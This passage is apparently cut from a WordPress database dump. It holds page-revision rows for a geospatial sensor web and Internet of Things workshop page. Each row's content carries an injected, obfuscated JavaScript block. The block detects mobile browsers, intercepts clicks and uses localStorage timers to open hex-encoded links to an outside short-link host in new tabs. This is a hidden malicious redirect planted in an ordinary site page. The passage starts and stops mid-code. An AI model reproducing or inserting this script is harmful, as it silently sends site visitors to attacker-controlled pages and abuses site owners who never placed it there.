g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:10:39','2022-12-06 05:10:39','',3386,'https://gsw2023.com/?p=3406',0,'revision','',0),
(3407,1,'2022-12-06 05:11:00','2022-12-06 05:11:00','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" resized_image_dimensions=\"8x20\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2022-12-06 05:11:00','2022-12-06 05:11:00','',3386,'https://gsw2023.com/?p=3407',0,'revision','',0),
(3408,1,'2022-12-06 05:11:22','2022-12-06 05:11:22','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 style=\"text-align:justify; color:black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" type=\"masonry\" resized_image_dimensions=\"8x15\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 